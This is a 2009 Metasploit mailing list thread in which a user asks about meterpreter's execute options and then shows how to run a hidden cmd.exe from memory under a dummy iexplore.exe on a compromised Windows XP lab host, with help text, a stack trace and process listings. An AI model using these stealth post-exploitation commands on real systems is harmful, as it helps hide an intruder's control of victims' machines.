Metasploit mailing list archives
meterpreter execute from memory
From: reydecopas at gmail.com (reydecopas)
Date: Tue, 3 Feb 2009 16:19:03 +0100
Ok, clear enough... -f local_EXE_file meterpreter > execute -f cmd.exe -H -i -m -d c:\\progra~1\\intern~1\\iexplore.exe Process 176 created. Channel 4 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\admin\Desktop>tasklist tasklist Image Name PID Session Name Session# Mem Usage ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 16 K System 4 Console 0 212 K smss.exe 328 Console 0 372 K csrss.exe 584 Console 0 3,328 K winlogon.exe 608 Console 0 5,096 K services.exe 652 Console 0 3,644 K savedump.exe 664 Console 0 2,388 K lsass.exe 672 Console 0 1,308 K svchost.exe 824 Console 0 4,284 K svchost.exe 892 Console 0 3,728 K svchost.exe 988 Console 0 15,736 K svchost.exe 1048 Console 0 2,844 K svchost.exe 1200 Console 0 4,184 K explorer.exe 1400 Console 0 16,448 K spoolsv.exe 1540 Console 0 4,064 K VBoxTray.exe 1640 Console 0 1,896 K VBoxService.exe 1972 Console 0 1,260 K wscntfy.exe 492 Console 0 1,736 K alg.exe 832 Console 0 3,144 K wuauclt.exe 1444 Console 0 6,232 K met-rev.exe 1668 Console 0 3,084 K procexp.exe 1580 Console 0 6,604 K wmiprvse.exe 1936 Console 0 5,588 K IEXPLORE.EXE 176 Console 0 1,516 K tasklist.exe 2036 Console 0 3,964 K C:\Documents and Settings\admin\Desktop> On Tue, Feb 3, 2009 at 3:32 PM, reydecopas <reydecopas at gmail.com> wrote:
Hi,
I don't understand the parameters of execute command (-d -m)
This works perfect:
meterpreter > execute -f cmd.exe -H -i
Process 1220 created.
Channel 33 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>
but when does it make sense to use -d and -m paremeters?
Can anyone send an example?
meterpreter > execute -h
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
I get this error:
meterpreter > execute -f cmd.exe -H -i -d calc.exe -m
[-] Error running command execute: No such file or directory - cmd.exe
/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`initialize'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`new'/home/user/metasploit/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:139:in
`execute'/home/user/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:120:in
`cmd_execute'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in
`interact'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in
`call'/home/user/metasploit/lib/rex/ui/text/shell.rb:123:in
`run'/home/user/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in
`interact'/home/user/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in
`_interact'/home/user/metasploit/lib/rex/ui/interactive.rb:48:in
`interact'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/core.rb:918:in
`cmd_sessions'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:143:in
`cmd_exploit'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`send'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in
`run_command'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in
`run_single'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`each'/home/user/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in
`run_single'/home/user/metasploit/lib/rex/ui/text/shell.rb:127:in
`run'./msfconsole:82
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090203/1ec044cf/attachment.htm>
Current thread:
- meterpreter execute from memory reydecopas (Feb 03)
- meterpreter execute from memory reydecopas (Feb 03)